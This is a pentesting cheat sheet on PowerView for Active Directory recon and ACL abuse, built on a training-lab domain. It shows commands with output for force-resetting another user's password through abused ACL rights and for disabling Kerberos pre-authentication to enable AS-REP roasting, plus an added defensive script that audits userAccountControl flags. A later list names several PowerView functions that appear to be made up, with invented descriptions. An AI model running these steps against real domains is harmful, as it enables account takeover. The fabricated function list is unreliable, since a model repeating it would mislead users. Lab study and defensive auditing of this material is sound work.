# PowerView

* <https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1>

| Command                         | Description                                                                                |
| ------------------------------- | ------------------------------------------------------------------------------------------ |
| Export-PowerViewCSV             | Append results to a CSV file                                                               |
| ConvertTo-SID                   | Convert a User or group name to its SID value                                              |
| Get-DomainSPNTicket             | Requests the Kerberos ticket for a specified Service Principal Name (SPN) account          |
| Domain/LDAP Functions:          |                                                                                            |
| Get-Domain                      | Will return the AD object for the current (or specified) domain                            |
| Get-DomainController            | Return a list of the Domain Controllers for the specified domain                           |
| Get-DomainUser                  | Will return all users or specific user objects in AD                                       |
| Get-DomainComputer              | Will return all computers or specific computer objects in AD                               |
| Get-DomainGroup                 | Will return all groups or specific group objects in AD                                     |
| Get-DomainOU                    | Search for all or specific OU objects in AD                                                |
| Find-InterestingDomainAcl       | Finds object ACLs in the domain with modification rights set to non-built in objects       |
| Get-DomainGroupMember           | Will return the members of a specific domain group                                         |
| Get-DomainFileServer            | Returns a list of servers likely functioning as file servers                               |
| Get-DomainDFSShare              | Returns a list of all distributed file systems for the current (or specified) domain       |
| GPO Functions:                  |                                                                                            |
| Get-DomainGPO                   | Will return all GPOs or specific GPO objects in AD                                         |
| Get-DomainPolicy                | Returns the default domain policy or the domain controller policy for the current domain   |
| Computer Enumeration Functions: |                                                                                            |
| Get-NetLocalGroup               | Enumerates local groups on the local or a remote machine                                   |
| Get-NetLocalGroupMember         | Enumerates members of a specific local group                                               |
| Get-NetShare                    | Returns open shares on the local (or a remote) machine                                     |
| Get-NetSession                  | Will return session information for the local (or a remote) machine                        |
| Test-AdminAccess                | Tests if the current user has administrative access to the local (or a remote) machine     |
| Threaded 'Meta'-Functions:      |                                                                                            |
| Find-DomainUserLocation         | Finds machines where specific users are logged in                                          |
| Find-DomainShare                | Finds reachable shares on domain machines                                                  |
| Find-InterestingDomainShareFile | Searches for files matching specific criteria on readable shares in the domain             |
| Find-LocalAdminAccess           | Find machines on the local domain where the current user has local administrator access    |
| Domain Trust Functions:         |                                                                                            |
| Get-DomainTrust                 | Returns domain trusts for the current domain or a specified domain                         |
| Get-ForestTrust                 | Returns all forest trusts for the current forest or a specified forest                     |
| Get-DomainForeignUser           | Enumerates users who are in groups outside of the user's domain                            |
| Get-DomainForeignGroupMember    | Enumerates groups with users outside of the group's domain and returns each foreign member |
| Get-DomainTrustMapping          | Will enumerate all trusts for the current domain and any others seen.                      |

[PowerView/SharpView](https://book.hacktricks.xyz/windows-hardening/basic-powershell-for-pentesters/powerview)

**Creating a List of Domain Users**

```powershell
PS> Get-ADUser -Filter * | Select-Object -ExpandProperty SamAccountName > ad_users.txt
```

**Find Interesting ACL**

```powershell
Find-InterestingDomainAcl
```

**Convert-NameToSid**

```powershell
PS C:\htb> $sid = Convert-NameToSid wley
```

**Using Get-DomainObjectACL**

```powershell
Get-DomainObjectACL -Identity * | ? {$_.SecurityIdentifier -eq $sid}
```

**Get ActiveDirectoryRights**

Interesting permissions:

* **GenericAll** - full rights to the object (e.g. add users to a group or reset a user's password)
* **GenericWrite** - update the object's attributes (e.g. logon script)
* **WriteOwner** - change the object owner to an attacker-controlled user to take over the object
* **WriteDACL** - modify the object's ACEs and grant the attacker full control over the object
* **AllExtendedRights** - ability to add a user to a group or reset a password
* **ForceChangePassword** - ability to change a user's password
* **Self (Self-Membership)** - ability to add yourself to a group

```powershell
Get-ObjectAcl -SamAccountName <samaccountname> -ResolveGUIDs

Get-ObjectAcl -SamAccountName carole.holmes -ResolveGuids | ? {$_.ActiveDirectoryRights -match ("WriteDacl|GenericWrite|GenericAll") }
```

**Resolving GUID**

```powershell
Get-DomainObjectACL -ResolveGUIDs -Identity * | ? {$_.SecurityIdentifier -eq $sid}
```

**Change Password `Force-Change-Password`**

```powershell
PS C:\htb> $SecPassword = ConvertTo-SecureString '<PASSWORD HERE>' -AsPlainText -Force
PS C:\htb> $Cred = New-Object System.Management.Automation.PSCredential('INLANEFREIGHT\wley', $SecPassword)

PS C:\htb> $damundsenPassword = ConvertTo-SecureString 'Pwn3d_by_ACLs!' -AsPlainText -Force
PS C:\htb> cd C:\Tools\
PS C:\htb> Import-Module .\PowerView.ps1
PS C:\htb> Set-DomainUserPassword -Identity damundsen -AccountPassword $damundsenPassword -Credential $Cred -Verbose

VERBOSE: [Get-PrincipalContext] Using alternate credentials
VERBOSE: [Set-DomainUserPassword] Attempting to set the password for user 'damundsen'
VERBOSE: [Set-DomainUserPassword] Password for user 'damundsen' successfully reset
```

**Get Group Members (local and domain)**

```powershell
PS C:\Tools> Get-NetLocalGroupMember  -GroupName "Remote Management Users"

ComputerName : ACADEMY-EA-MS01
GroupName    : Remote Management Users
MemberName   : INLANEFREIGHT\forend
SID          : S-1-5-21-3842939050-3880317879-2865463114-5614
IsGroup      : False
IsDomain     : UNKNOWN

PS C:\Tools> Get-DomainGroupMember -Identity "Remote Management Users" -Recurse

GroupDomain             : INLANEFREIGHT.LOCAL
GroupName               : Remote Management Users
GroupDistinguishedName  : CN=Remote Management Users,CN=Builtin,DC=INLANEFREIGHT,DC=LOCAL
MemberDomain            : INLANEFREIGHT.LOCAL
MemberName              : bdavis
MemberDistinguishedName : CN=Brian Davis,OU=Server Admin,OU=IT,OU=HQ-NYC,OU=Employees,OU=Corp,DC=INLANEFREIGHT,DC=LOCAL
MemberObjectClass       : user
MemberSID               : S-1-5-21-3842939050-3880317879-2865463114-1162
```

***

**AS-REPRoasting**

```powershell
PS C:\Tools> Import-Module .\PowerView.ps1
PS C:\Tools> Get-DomainUser -UACFilter DONT_REQ_PREAUTH
...
```

***

**Set DONT\_REQ\_PREAUTH with PowerView**

```powershell
PS C:\Tools> Import-Module .\PowerView.ps1
PS C:\Tools> Set-DomainObject -Identity userName -XOR @{useraccountcontrol=4194304} -Verbose

VERBOSE: [Get-DomainSearcher] search base: LDAP://DC01.INLANEFREIGHT.LOCAL/DC=INLANEFREIGHT,DC=LOCAL
VERBOSE: [Get-DomainObject] Get-DomainObject filter string: (&(|(|(samAccountName=userName)(name=userName)(displayname=userName))))
VERBOSE: [Set-DomainObject] XORing 'useraccountcontrol' with '4194304' for object 'userName'
```
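The `4194304` XORed into `useraccountcontrol` above is the `DONT_REQ_PREAUTH` bit (0x400000); `-XOR` toggles it, so the same command run twice sets and then clears it. The following is an added example, not code from this page or from PowerView: it decodes `userAccountControl` into its flag names and reports accounts that carry the bits worth auditing (pre-auth disabled, delegation, no password required). The account objects are constructed sample data; the function and variable names are this example's own.

```powershell
# Added example (not PowerView code): decode userAccountControl bits and flag risky ones.
# Bit values are the documented UF_* constants from the userAccountControl attribute.
$UacFlags = [ordered]@{
    ACCOUNTDISABLE                 = 0x0002
    PASSWD_NOTREQD                 = 0x0020
    NORMAL_ACCOUNT                 = 0x0200
    DONT_EXPIRE_PASSWORD           = 0x10000
    TRUSTED_FOR_DELEGATION         = 0x80000     # unconstrained delegation
    USE_DES_KEY_ONLY               = 0x200000
    DONT_REQ_PREAUTH               = 0x400000    # 4194304, the value XORed by Set-DomainObject above
    TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000   # constrained delegation with protocol transition
}
# Flags a defender should review wherever they are set
$RiskyFlags = 'PASSWD_NOTREQD','TRUSTED_FOR_DELEGATION','USE_DES_KEY_ONLY',
              'DONT_REQ_PREAUTH','TRUSTED_TO_AUTH_FOR_DELEGATION'

function ConvertFrom-UserAccountControl {
    param([Parameter(Mandatory)][int]$Value)
    # Return the name of every known bit set in $Value
    $UacFlags.GetEnumerator() | Where-Object { ($Value -band $_.Value) -ne 0 } | ForEach-Object { $_.Key }
}

function Get-RiskyUacAccount {
    param([Parameter(Mandatory)][object[]]$Account)
    foreach ($a in $Account) {
        $set   = @(ConvertFrom-UserAccountControl -Value $a.useraccountcontrol)
        $risky = @($set | Where-Object { $RiskyFlags -contains $_ })
        if ($risky.Count -gt 0) {
            [pscustomobject]@{
                samaccountname     = $a.samaccountname
                useraccountcontrol = ('0x{0:X}' -f $a.useraccountcontrol)
                RiskyFlags         = ($risky -join ',')
            }
        }
    }
}

# Constructed sample input (hypothetical accounts). In a real audit feed in
#   Get-DomainUser -Properties samaccountname,useraccountcontrol   (PowerView) or
#   Get-ADUser -Filter * -Properties userAccountControl            (ActiveDirectory module)
$sample = @(
    [pscustomobject]@{ samaccountname = 'alice';   useraccountcontrol = 0x200 }                 # NORMAL_ACCOUNT only
    [pscustomobject]@{ samaccountname = 'svc_app'; useraccountcontrol = (0x200 -bxor 0x400000) } # after the XOR above
    [pscustomobject]@{ samaccountname = 'svc_web'; useraccountcontrol = (0x10200 -bor 0x80000) } # unconstrained delegation
)
Get-RiskyUacAccount -Account $sample | Format-Table -AutoSize
```

Only `svc_app` (DONT_REQ_PREAUTH) and `svc_web` (TRUSTED_FOR_DELEGATION) are reported; a change to this attribute on a domain controller is also recorded in Security event ID 4738 (a user account was changed), which carries the old and new `userAccountControl` values.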

***

**Active Directory Information**

* `Get-NetDomain`: Gets information about the current domain.
* `Get-NetForest`: Gets information about the current forest.
* `Get-NetDomainController`: Gets the domain controllers in the current domain.
* `Get-NetGroup`: Gets information about Active Directory groups.
* `Get-NetUser`: Gets information about Active Directory users.
* `Get-NetComputer`: Gets information about Active Directory computers.
* `Get-NetOU`: Gets information about Active Directory organizational units.

**Enumeration**

* `Get-NetGroupMember`: Gets the members of a group.
* `Get-NetLocalGroup`: Gets the local groups on a remote computer.
* `Get-NetLocalGroupMember`: Gets the members of a local group on a remote computer.
* `Get-NetShare`: Gets the network shares on a remote computer.
* `Get-NetLoggedon`: Gets the users currently logged on to a remote computer.

**Privilege Exploration**

* `Find-LocalAdminAccess`: Finds user accounts that have local administrator access on remote computers.
* `Find-DomainUserLocation`: Finds the computers a user has access to.
* `Find-InterestingDomainShareFile`: Finds interesting shared files within Active Directory.

**Trust Relationship Exploration**

* `Get-NetDomainTrust`: Gets the trust relationships between domains.
* `Get-NetForestTrust`: Gets the trust relationships between forests.

**Remote Execution**

* `Invoke-NetCommand`: Runs a command remotely on one or more computers.

**Permission Enumeration**

* `Get-NetFilePermissions`: Gets file permissions on a remote computer.
* `Get-NetSharePermissions`: Gets network share permissions on a remote computer.
* `Get-NetLocalGroupMapping`: Gets the local group mapping on a remote computer.
* `Get-NetEffectivePermission`: Gets the effective permissions of a user or group on a resource.

**Service Enumeration**

* `Get-NetService`: Gets information about the services running on a remote computer.
* `Get-NetLoggedon`: Gets the users currently logged on to a remote computer.

**Token Enumeration**

* `Get-NetToken`: Gets information about user and system tokens on a remote computer.

**Session Enumeration**

* `Get-NetSession`: Gets the network sessions on a remote computer.
* `Get-NetLoggedon`: Gets the users currently logged on to a remote computer.

**Trust Enumeration**

* `Get-NetDomainTrust`: Gets the trust relationships between domains.
* `Get-NetForestTrust`: Gets the trust relationships between forests.

**SID History Management**

* `Invoke-NetUserAdd`: Adds a SID to a user account.
* `Invoke-NetUserClone`: Clones a user account, including its SID History attributes.

**Domain Management**

* `Add-NetGroupMember`: Adds a member to an Active Directory group.
* `Add-NetGroupUser`: Adds a user to an Active Directory group.
* `Add-NetLocalGroupMember`: Adds a member to a local group on a remote computer.

***

### Kerberos Delegation

**User Unconstrained Delegation**

```powershell
Get-NetUser | Where-Object { $_.TrustedForDelegation }
```

**Constrained Delegation**

```powershell
Get-DomainComputer -TrustedToAuth
```

**Find Users With ActiveDirectoryRights (WriteDacl|GenericWrite|GenericAll)**

```powershell
Get-ObjectAcl -SamAccountName carole.holmes -ResolveGuids | ? {$_.ActiveDirectoryRights -match ("WriteDacl|GenericWrite|GenericAll") }
```

**Retrieving Domain SID**

```powershell
PS C:\Tools> Import-Module .\PowerView.ps1
PS C:\Tools> Get-DomainSID

S-1-5-21-2974783224-3764228556-2640795941
```

***

**General Tips**

<https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993>
